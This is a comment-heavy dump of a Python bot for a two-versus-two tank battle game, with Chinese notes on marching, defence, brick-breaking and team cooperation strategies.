player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # # 允许 3 步延迟 # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # # 获得移动后的坐标 # 是否符合移动的条件 # 打破僵局 # 当回合可以射击 # 上回合也可以射击 # 说明敌人大概率不打算攻击我 # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 5cd33351a51e681f0e91da39 # # 向着远处移动了 # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # # 下一步将会打掉一个墙 # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # # 一回合假设我方射击,敌人任意行为 # 二回合假设我方移动,敌人射击 # 自动判断是否可射击 # 然后这回合我方坦克挂了 # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # # 只有在我方地盘的时候才触发 # # 首先实现禁止随便破墙 # # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # # # 敌人下一步可能移到墙后面 # # 此时如果直接出现在墙的后面 # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- # 即将停留第二回合 # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 # 否则标记为防止被杀,用于上面的触发 #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... # (inserted) 强攻信号 #------------------------- # 应该是移动行为,且不需检查安全性 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" # 一定能找到路 # 可能出现这种队友堵住去路的及其特殊的情况! 5cdde41fd2337e01c79f1284 # 不必别人领先的情况下,就不要 delay 了 ... # 允许和对手同时到达,但由于我方先手,实际上应该是领先的 # # 在我方地盘时,优先从边路攻击 # 到达敌方场地,优先从中路攻击 # # 5cde18e7d2337e01c79f47c8 # # isMiddleFirst = battler.is_in_enemy_site() # # TODO: # 不要采用中路优先的搜索,否则容易打出狭路,然后因为敌人对自己存在威胁而停止不前! # 5ce48c2fd2337e01c7a6459b # # 如果我方两架坦克都到达了敌方基地,处于双方均不回头的局面 5cec9157641dd10fdcc5f30d # 那么可以采用 x-axis-first 以更好地触发团队合作,因为它优先选择拆除 x = 4 的墙 # # 如果双方都处在对方基地,并且都没有遭遇到敌人 # 想要使用 x-axis-first 必须首先 middle-first # # 在我方基地的时候,不要评估敌人对攻击路线的干扰,而是优先采用边路优先的搜索。这样可能和敌人相撞, # 但至少可以平局。如果在我方基地就开始衡量敌人的干扰,那么敌人绕边路的时候我方可能会选择中路, # 这种情况下可能会被另一边的敌人干扰,出现一牵二的局面。 # # 还可能遇到一种很糟糕的情况,就是我方为了绕开敌人而选择了一条比最短路线要长的路,这种情况下 # 可能我方最终就会落后与对方,这样如果还绕过了敌人,那就根本没法拦截了,到最后肯定是输。 # # TODO: # ---------------------- # 这个影响对于bot的侵略性影响非常大,因为很容易因此和对方平局。并且边路分拆难以触发合作拆家, # 进攻优势会被削弱。也许可以一牵二的情况进行特判,其他情况继续绕路? # 也许需要根据情况进行判定,毕竟一牵二的情况和绕路拆家结果反而赢了的情况是有的,而且似乎都不少见 # # 这回合的进攻路线 # 将会返回的行为,默认为 STAY # # 对于最优方案的缓存,用于判断次优行为是否合理 # 没事老回头实在是太蠢了! 5cee6790641dd10fdcc8de2c # 有路也不是这样走啊! # # 第一条路线给出的进攻行为 # 第一条路线下玩家真实决策的而行为 # 第一个进攻行为是否因为受到敌人拦截而受阻 # 缓存第一次决策时的状态 # 当前是否为第一条路径 # 缓存第一条路径 # # TODO: # 仅仅在此处综合考虑路线长度和敌人的影响,有必要统一让所有尝试获得下一步行为的函数都 # 以于此处相同的方式获得下一攻击行为 # # for route in battler.get_all_shortest_attacking_routes(): # 目的是找到一个不是停留的动作,避免浪费时间 # for route in sorted_routes_by_enemy_effect( # battler.get_all_shortest_attacking_routes(delay=allowedDelay), player ): # for route in sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), # key=lambda r: estimate_enemy_effect_on_route(r, player) ): # 缓存已经考虑过的结果 # 引入 idx 用于判断是第几个路线 # 首先清除可能出现的状态,也就是导致 stay 的状况 ????? # 恰好过了第二回合 # 确保所有 continue 语句设置的 status 都可以在这里被捕获 # 缓存行为和路线 # 缓存攻击行为,避免重复判断 # 下一步是停留,就没必要过多判断了 # 缓存真实判断 # debug_print(player, attackAction, realAction) # 存在风险 # 特殊情况,如果下下回合就要打掉对方基地 # 那就没必要乱跑了 5cddde4dd2337e01c79f0ba3 # # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 在上方的主动防御模式里还有一段和这里逻辑基本一致的代码 #-------------------------- # 即将停留第二回合 # # 判断敌人不会攻击我的标准 # # 1. 敌人当前回合可以射击 # 2。 敌人上回合也可以射击 # 3. 敌人上回合与上上回合的行为相同,也就是已经连续移动了两个回合或者等待了两个回合 # 这个补充条件非常重要 5cde71a4d2337e01c79f9a77 # # TODO: # 这个条件仍然不对!! 5ce220add2337e01c7a38462 # # 当回合可以射击 # 上回合也可以射击 # 说明敌人大概率不打算攻击我 # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 # TODO: # 此处需要检查是否应该预先破墙 5ce21ba2d2337e01c7a37dbd # # 原本的移动,现在变为停留 #------------------------ # 停着就是在浪费时间,不如选择进攻 # # # 如果当前回合射击可以摧毁的对象中,包含自己最短路线上的块 # 那么就射击 # # 为 block 对象,该回合可以射击 # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # # 如果能摧毁的是基地外墙,仍然选择攻击 # 因为在攻击后可能可以给出更加短的路线 # # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # # 如果不能摧毁和地方基地周围的墙,但是可以摧毁与自己中间相差一格的墙,那么仍然选择攻击 # 这种情况多半属于,如果当前回合往前走一步,可能被垂直方向的敌人射杀,因为不敢前进 # 在多回合后,我方可能会主动突破这种僵持情况。在我方主动向前一步的时候,敌人将可以 # 射击我方坦克。如果前方有一个空位,那么我方坦克就可以闪避到前方的空位上,从而继续前进。 # 如果这个位置本来是个砖块,但是没有预先摧毁,我方坦克在突击后就只能选择原路闪回, # 那么就可能出现僵局 # 因此这里预先摧毁和自己相差一格的土墙,方便后续突击 # # 如果是防御状态,那么不要随便打破墙壁! 5cd31d84a51e681f0e91ca2c # # 防御性无效 # 只有在对方基地的时候才有效 # 距离为 2 相当于土墙 # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 # 如果为射击行为,检查是否是墙后敌人造成的 # 额外指定一下,确保是这个敌人造成的 # # 强攻行为,如果出现这种情况,双方均在拆家,但是对方坦克下一步有可能移到我方坦克后方 # 对于这种情况,大部分人应该选择继续进攻,同时绕开麻烦,因为进攻的时候还考虑击杀敌人 # 一般会延误战机。这种情况下应该判定为敌方坦克不会来尝试击杀我方坦克,那么就继续攻击 # 5ce57074d2337e01c7a7b128 # # 双方均在对方基地方时才触发 # # 现在尝试看对方是否能够找到一条不受到我方坦克影响的最短攻击路线 # 通常应该是可以找到的 # # 缓存已经考虑过的行为 # 说明找到了一条可以躲开我方坦克的路线 # # 否则停止不前 # 此时必定有 riskyEnemy # # 可能触发 Signal.PREPARE_FOR_BREAK_BRICK 和 Signal.FORCED_MARCH # TODO: 这个状态是普适性的,希望在上面的各种情况中都能补全 # 缓存状态,仅仅在因为防止被杀而停留的状态下缓存,其他情况不算 # 结束时常规地要复制一次,避免没有第二条路的情况 # 停留动作,尝试继续寻找 # 对于移动行为,有可能处于闪避到远路又回来的僵局中 5cd009e0a51e681f0e8f3ffb # 因此在这里根据前期状态尝试打破僵局 #---------------------------------- # 说明上回合刚闪避回来 # 然后这回合又准备回去 # TODO: # 此处是否有必要进一步检查两次遇到的敌人为同一人? # # # 首先考虑前方相距一格处是否有土墙,如果有,那么就凿墙 5cd009e0a51e681f0e8f3ffb # # 这个 brick 必须不在我方基地! # 真实体现 #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY) # 如果能够运行到这里,就添加这个标记 # 预判一步,如果下一步会遇到敌人,并且不得不回头闪避的话,就考虑先摧毁与自己中间相差一格的墙(如果存在) # 类似于主动防御的情况 # # 如果已经和基地处在同一直线上 # 如果移动后不再面对敌人基地,那么就不移动 # 防御性无效 # 只有在敌方地盘时才有效! # 如果下回合能射掉一个墙 # 没有敌人根本不需要预判 # 只有 route1 为 delay = 0 的选择才可比较 # 如果存在着一种闪避方法使得闪避后线路长度可以不超过原线路长度 # 那么就不破墙 # 现在尝试破墙 # 距离为 2 的土墙 # 不检查安全性 # 需要射击但是暂时没有炮弹,那么就等待 # # 考虑这样一种情况,如果下回合我可以射击且对方可以射击,我们中间差两个墙,如果我方不射击 # 对方可能就会压制过来,这样就很亏,所以当双方都有炮且两者间差一个墙的时候,我方优先射击 # 5cea974dd2337e01c7add31f # # 前方是墙 # 现在墙后无人 # 现在前面还有墙 # 此时墙后有人 # 此时对方也可以射击 # 那么我方这回合优先开炮,避免随后和对方进入僵持阶段 # # move action 在这之前必须要全部处理完! # # # 侵略模式下优先射击,如果能够打掉处在最短路线上的墙壁 #------------------- # 能够打掉一个处于最短路线上的土墙 # 注意:这里修改了 realAction 方便后续判断,但是这是非常不好的一个做法 # # 禁止随便破墙!容易导致自己陷入被动! # # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # # 墙后有人,不能射击 # 否则就等待 #--------------- # 设置这个敌人! # # 敌人下一步可能移到墙后面 # # 此时如果直接出现在墙的后面 # 仍然将其设置为墙后敌人 # # 并不是一定不能破墙,需要检查敌人是否真的有威胁 # # 1. 和队友相遇的敌人可以忽略 5ce209c1d2337e01c7a36a0a # 2. 和队友隔墙僵持的敌人可以忽略(这种情况非常有可能) 5ce5678ed2337e01c7a79ace # 3. 对手正在和队友僵持的敌人可以忽略 5ce70df6d2337e01c7a98926 # 4. 如果对手威胁我的位置他曾经到过,那么可以忽略 5ce266a1d2337e01c7a3cc90 # # 考虑两人相对 # 被队友牵制的敌人可以忽略 # 考虑是否隔墙僵持 # 和队友隔墙僵持的敌人可以忽略 # 考虑是否和队友僵持 # 模拟一步后和队友相遇 # # 如果敌人威胁我的位置它曾经到过(这种情况实际上包含了第三点) # # 先找到威胁我方坦克的位置 # (x, y) #assert _enemyRiskySite is not None # 一定会找到? # # 不在敌人的进攻路线上,这样才算是已经走过,否则可以认为他在晃墙? # 5cec129e4742030582fac36d # # 回滚成功则 True # 他曾经到过这个地方 # 不能在这种情况下破墙! 5cec129e4742030582fac36d # 先尝试 shoot 转 move #--------------- # 否则 stay # # (inserted) 打破老是回头的僵局 # # 尝试向着两边闪避 5ced9540641dd10fdcc79752 # # 好吧 ... 不加这个可能过不了自动测试 -> TODO: 也许我们不应该再替对方决策一遍? # 限制为严格地不在我方基地 # 可走的路线,那么直接闪避 # 那么就打破了这个状态 # 并将闪避方向作为这回合的攻击方向 # 否则继续攻击 # endfor # endwith # 缓存攻击路线 # # 现在判断是否是第一条路线,并考虑它的合理性! # # 乱回头实在是太蠢了! 5cee6727641dd10fdcc8dd96 -> 5cee6e3d641dd10fdcc8e8cf # # 选的是非第一条路线 # 不选一条的原因是为了防止被杀 # 这条路线给出的行为是移动 # 第一个进攻路线也是移动 # 于是这条路线给出的移动方向是远离进攻路线的方向! # 这种情况下应该停下来! # 找到一个侵略性的行为 # # 否则返回 STAY # 此处查找是否和第一条路线的决策结果一致,如果一致,那么就将第一次决策下的各种状态还原 # #{ END 'decision/single/marching.py' }# #{ BEGIN 'decision/team/individual.py' }# 两人分别单独地进行决策,团队决策的起点 #{ END 'decision/team/individual.py' }# #{ BEGIN 'decision/team/vital.py' }# 将关键的个人决策设置为团队决策,个人决策即为团队最优决策, 低优先级决策者不可对其进行协调 # 准备为防御基地牺牲 # 准备为防御基地堵路 # 准备攻击敌方基地 # 准备击杀敌人 # TODO: 牺牲攻击局,可能需要考虑一下闪避 5ccca535a51e681f0e8c7131 # 将个人决策设置为团队决策 #{ END 'decision/team/vital.py' }# #{ BEGIN 'decision/team/leave_teammate.py' }# 和队友打破重叠的团队决策 己方两个坦克重叠在一起这种事情实在是太愚蠢了 ... # 有队友已经挂了,那就不需要考虑这个情况了 # 一人移动一人非移动,那么是合理的 # 两人均为移动,但是两人的移动方向不一样,这样也是可以的 # 两者都拥有团队命令 # 两个队员可以认为是一样的,因此任意选择一个就好 # 保存更改 #{ END 'decision/team/leave_teammate.py' }# #{ BEGIN 'decision/team/forced_attack.py' }# 强攻信号 ---------------- 为了解决单人决策行为过于保守的问题 在攻击过程中,一些所谓的有潜在危险的行为,实际上一点危险都没有,但是为了防止出错,就原地等待, 这反而是贻误了战机,甚至最后还要匆忙转攻为守,实际上根本就防不住 所以应该根据战场形势分析潜在风险究竟有多大,如果实际上是没有风险的,就发动强攻信号,让攻击者 保持进攻,而不去过分规避风险 如下情况是值得发动强攻信号的: 1. 侵略/僵持模式,出现了停止前进,防止被杀的状况 - 敌人正在和队友交火,敌人此回合可以射击,但是下回合必定会攻击队友 - 敌人正在和队友隔墙僵持,敌人可以射击,但是他并不攻击,多半是为了拖延战局 - 敌人正在和队友重叠,敌人可以射击,但是他一直在等待队友决策 2. 侵略/僵持模式,出现了停止前进,两方均越过了中线,对方明显不会回头,不想防你 # 侵略模式 # 僵持模式 # 但是出现了停止前进 # 等待行军 # 是为了防止被杀 # 说明是因为没有弹药? # 考虑队友和敌军的情况 #debug_print(player.get_risky_enemy()) #debug_print(teammate.get_risky_enemy()) # 敌人正在和队友交火 #------------------ # 这种情况直接前进 # # 说明对方正准备和队友交火 # 敌人正在和队友隔墙僵持 #---------------------- # 如果他们僵持了超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友僵持,或者故意在拖时间 # # 那么可以直接进攻 # # 僵持超过一回合 # 已经等待了一回合 # 敌人正在和队友重叠 #---------------------------- # 如果他们重叠不动超过一回合以上 # 保守起见,等待一回合,如果对方并未攻击我,说明它更关心和队友重叠 # # 那么可以直接进 # # 僵持超过一回合 # 已经等待了一回合 # 双方均跨过中线 #----------------------------- # 那么不再反击,直接进攻? # # TODO: # 存在着一攻一守的 bot # # 建议强制行军 #{ END 'decision/team/forced_attack.py' }# #{ BEGIN 'decision/team/break_brick.py' }# 主动破墙的团队决策 ----------------- 乱破墙是不可以的,单人不要随便破墙,但是有条件的破墙是可以的 # 当前回合处于等待状态 # 墙后有人造成的 # 因此等待行军 #and not player.has_status(Status.DEFENSIVE) # 不要让防御性的队友随意破墙 # 目前有弹药 # and self.has_status_in_previous_turns(player, Status.WAIT_FOR_MARCHING, turns=1) # 改成一有机会就先留后路 # 触发的条件是一方隔墙,队友因为这两个人的僵持受到牵制 #---------------------------------------------------- # 僵持方先破墙,留好后路 #---------------------- # 下一步准备凿墙 # 至此该队员决策完成,等待它这回合凿墙 # elif signal3 == Signal.READY_TO_BREAK_BRICK: # 否则将受到破墙信号,开始判断是否符合破墙条件 # 获得墙后敌人 # 必定有风险敌人 # playerIdx = idx # teammateIdx = 1 - idx # 发现敌人和队友相遇,立即破墙 这个两个触发已经不再需要了 5ce217e8d2337e01c7a3790c # TODO: # 这种情况挺难遇到的,而且一旦遇到一般都为时过晚 # 应该要模拟地图预测一下,提前开一炮 # if (teammate.has_status(Status.WAIT_FOR_MARCHING) # 队友等待 # and self.has_status_in_previous_turns(teammate, Status.WAIT_FOR_MARCHING, turns=1) and teammate.has_status(Status.PREVENT_BEING_KILLED) # 队友是为了防止被杀 ): teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() # 墙后敌人 if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: # 两者受到同一个敌人牵制,那么发动破墙信号 _shouldBreakBrick = True elif ( teammate.has_status(Status.AGGRESSIVE) or teammate.has_status(Status.STALEMENT) ): teammateAction = returnActions[ teammateIdx ] if (Action.is_move(teammateAction) # 确保队友动作为移动 and teammate.has_status(Status.KEEP_ON_MARCHING) # 队友正在行军 ): # 尝试模拟下一回合的队友状态,并让队友重新决策,查看他的状态 with map_.simulate_one_action(teammate, teammateAction): action4, _ = teammate.make_decision() if (teammate.has_status(Status.WAIT_FOR_MARCHING) and teammate.has_status(Status.PREVENT_BEING_KILLED) ): # 这个时候队友被阻拦 teammateRiskyEnemyBattler = teammate.get_risky_enemy() playerRiskyEnemyBattler = player.get_risky_enemy() if teammateRiskyEnemyBattler is playerRiskyEnemyBattler: _shouldBreakBrick = True # 如果是因为对面墙的坦克在阻拦,那么马上破墙 # # 如果遇到对手准备和队友对射 5cd364e4a51e681f0e921e7a # 那么考虑直接破墙 # # 敌方当前回合应该必定会还击,否则就失去了防御的意义 # 于是,随后就会遇到二对一且三方均没有炮弹 # 如果对方下回合不走,那么二打一直接干掉 # 如果对方下回合移动,那么攻击的队友就解除了威胁,可以继续前进 # #{ END 'decision/team/break_brick.py' }# #{ BEGIN 'decision/team/back_to_help.py' }# 考虑一种墙后后退的逻辑 5cea650cd2337e01c7ad8de4 这样可以制造二打一的局面 TODO: 回退后可能会造成 WITHDRAW 的情况出现 ? # 保持对射行为, # TODO: # 或许可以考虑用 对射状态描述撤退状态下的对射? # 5cee87fc641dd10fdcc91b44 为何空指针 ??? # 当前和我墙后僵持的敌人的队友 # 应该不会这样? #{ END 'decision/team/back_to_help.py' }# #{ BEGIN 'decision/team/prevent_team_hurt.py' }# 防止队员自残 -------------- 在决策链的最后,判断是否出现队友恰好打掉准备移动的队友的情况,并加以协调 # 有队友已经挂了,没必要考虑这个情况 # 刚好把队友打死 ... # # TODO: # 如何决策? # 改动射击和决策都有可能很危险 # # # 这里先做一个特殊情况,那就是重叠攻击基地,这种情况将移动的队友视为不移动 # # TODO: # 好吧,这种情况和主动和队友打破重叠的行为是相斥的 ... # if (moveBattler.xy == shootBattler.xy and moveBattler.is_face_to_enemy_base(ignore_brick=False) and shootBattler.is_face_to_enemy_base(ignore_brick=False) ): returnActions[movePlayer.id] = Action.STAY hasTeamActions[movePlayer.id] = True # # 先判断这种情况 5ce92f70d2337e01c7abf587 #----------------- # # 默认让射击队友停下 #-------------------- # # 以下情况,应该让 moveBattler 停下来 # # 1. 射击队友正在和敌人对射 # 2. 射击队员正面向敌人基地(为了触发团队协作) # # 其他更有待补充 ... # #{ END 'decision/team/prevent_team_hurt.py' }# #{ BEGIN 'decision/team/cut_through_midline.py' }# 当我方队员与敌人在墙后僵持,并且不得不选择等待的时候 考虑是否可以打通土墙,因为这个时候也许可以干扰另一路敌人的进攻路线 # # 保守起见,先等待一回合 # # TODO: # 有可能延误战机! 5ced7ce1641dd10fdcc776b1 # 这样才是对的 5ced7d66641dd10fdcc777ae # # if not player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1): # continue # 当前回合处于等待状态 # 墙后有人造成的 # 因此等待行军 # 必须要能够射击 # 只有中线附近的队友才会触发这个攻击条件 # 实际考虑的是它的队员! # 对方已经输了,就不用管了 ... # 将会打掉一个砖块 # # 首先判断这一步射击是否会阻止敌人的移动 # # 敌人下回合打算行军,但是受到我方坦克的影响而停止 # 那就算了 # # 判断是否摧毁了敌人进攻路线上的块 # # 首先判断这个块是否和当前坦克处在不同测的地图上 # _dx == 0 表示 x = 4 中线的墙可以打掉 # 不要打掉这个块? # # 防止出现我方坦克打掉一个块,对方可以突然出现在 field 前 # # 好吧,还是要判断一下这种情况的 ... # # 现在说明可以射击 # #{ END 'decision/team/cut_through_midline.py' }# #{ BEGIN 'decision/team/cooperative_attack.py' }# 团队合作拆家策略 ----------------- 案例 ------------ 1. 5ceacbd0811959055e22139d 需要预判 1 步 -> 5cec07f30df42d28e72de8d8 2. 5ce8db66d2337e01c7ab9fae 需要预判 3 步 -> 5cec1a324742030582fad728 3. 5cec9157641dd10fdcc5f30d 重叠进攻时能够分开射击了 4. 5cec9a19641dd10fdcc5ff9f case 3 的另一种实现,提前找到合作路线 5. 5cec9c10641dd10fdcc60254 case 2 的另一种实现 6. 5cec9d01641dd10fdcc6045a 合作与不合作路线相同,但是选择了合作 7. 5cec9d7f641dd10fdcc60556 8. 5ceca04d641dd10fdcc60aed case 2 的另一种实现,但是路线更短,因为将合作触发条件放宽到非严格过中线! 9. 5ceca0ab641dd10fdcc60bb6 将合作条件放宽到非严格过中线可以触发的合作拆家 10. 5ceca21b641dd10fdcc60d4d 11. 5ceca3c3641dd10fdcc61071 12. 5ceca80d641dd10fdcc617e9 13. 5cecabbd641dd10fdcc61d34 14. 5cecfa94641dd10fdcc69661 触发前提 -------------- 在双方均到达对方基地的前提下,假定双方坦克不会再发生交火。在这种情况下,可以认为找到的 最短路线即为实际可走的、不受敌方影响的最短路线。那么可以进行团队合作,寻找一条两人合作下 距离更加短的进攻路线 实现方法 -------------- 下面给出一种简单的实现方法(只预判一回合,更加复杂的情况尚未能实现) 这个策略中存在主攻队员和辅助队员的角色划分。这个并不能在一开始就得出定论,而是要通过判断。 首先,合作拆家所希望达到的效果是,辅助队员帮助主攻队员清除其路线上的土墙,从而减短主攻队员的 攻击路线长度。每清除掉一个土墙,能够减少的路径长度为 2 因此,首先在 delay = 1 的限制条件下,找到其中一个进攻队员所有可能的最短路线。 delay = 1 是允许的, 因为一个土墙的权重是 2 ,打掉 delay = 1 的路线上的一个土墙,可以得到比 delay = 0 的最短路线更加短的路线。 然后考虑另一个进攻队员当前回合所有可能的攻击行为。找到这些攻击行为下能够摧毁掉的 fields ,如果恰好是 位于另一队员攻击路线上的土墙,那么就找到了一条双人合作下的更短路线。 依照上述方法,可以列举出所有可能的最短路线。对这些路线长度进行排序以找到最短的路线,即为团队合作下更优 的一种拆家路线。 补充的更复杂实现 ----------------- 有的时候会出现两个队友攻击路线相同且刚好互相不会影响 5ce8db66d2337e01c7ab9fae ,这种情况下实际上仍然 有机会产生团队合作,但是需要预判 3 步,第一步首先考虑所有可能的进攻行为,第二步按照正常的进攻方向,第三步 再尝试寻找团队更优路线,如果此时可以找到团队合作路线,那么当前回合就先采用第一步的进攻行为。第二步照常进攻 到了第三步的时候就会被上面那种单回合的合作拆家决策找到合作路线。 特判情况 ----------- 1. 考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 # 优先中路搜索 # 优先 x-轴优先搜索 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # # 打掉的是同一个块 # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 # 否则可以让攻击方这回合等待 # 找不到,返回 None # 不是两个人就不需要考虑合作了 # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # # 不可以拥有和敌人遭遇战斗相关的状态 # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] # 当前回合不能进攻,那就无法发起协助了 ... # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # # 缓存已经尝试过的第一步两个方向 # 攻击方第一步允许 delay = 1 ## 模拟两步 ## # 模拟两步找到路线 ## 模拟三步 ## # 模拟三步找到路线 #{ END 'decision/team/cooperative_attack.py' }# #{ BEGIN 'decision/team/dummy_ending.py' }# 用于结束 DecisionChain 的结尾 返回 True ,这样 DecisionChain 就会结束 将 player 缓存的结果直接返回 #{ END 'decision/team/dummy_ending.py' }# #{ BEGIN 'player.py' }# # 不能处理的情况,返回 Action.INVALID #------------------------------------ # 值得注意的是,由于 Player 仅仅被 team 判断,signal 仅用于玩家与团队间交流,因此团队在判断时, # 不考虑玩家返回的信号,尽管玩家实际返回的值是 (action, signal) # # { (side, id): instance } 以 (side, id) 为主键,缓存已经创建过的玩家类,使之为 Singleton Input: - tank TankField/BattleTank 第一次必须是 TankField ,之后随意 - map Tank2Map # 只要有这两个属性就可以 # 使用自定义初始化条件初始化 # Tank2Team # Tank2Player # [Tank2Player, Tank2Player] # 当前回合的状态,可以有多个,每回合情况 # 对手给我做的标记,标记后长期有效 # 缓存引起潜在风险的敌人 BattleTank # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 # 缓存团队策略 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 对于不可变对象,只需进行简单的值复制 # 是否废弃当前快照,让 player 的状态永久改变 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 # (side, id) -> attributes # 创建深拷贝 # 复制值 # 复制引用 恢复到还原点的状态 # 保存更改的情况下,不再回滚 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 # singleton ! # -> Tank2Player # -> [Tank2Player, Tank2Player] 创建一个还原点,然后该 player 进行决策,决策完成后回滚 # 可以选择不接 snapshot # -> Tank2Player # -> [Tank2Player] 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 # -> BattleTank # 确保为 BattleTank 对象 # 返回最后一次决策的结果,用于队员间交流 # 用于团队设置队员的当前决策 # 获得当前的团队决策 # 用于团队设置队员的团队决策 # 添加一个或多个状态 # 删除一个或多个状态 # remove_if_exists # 清除所有状态 # 是否存在某种状态 # 添加一个或多个标记 # 是否存在某个标记 # 删除一个活多个标记 # 清楚全部标记 评估该这个决策是否安全 Return: - issafe bool 安全 # 先检查是否为有效行为 # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- # 对手本回合无法射击,则不必担心 # 提交地图模拟情况 # 移动后遇到两个敌人 # 并且两个敌人不在同一直线上 # 随便设置一个? # 移动后可能会被敌人打中 # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- # 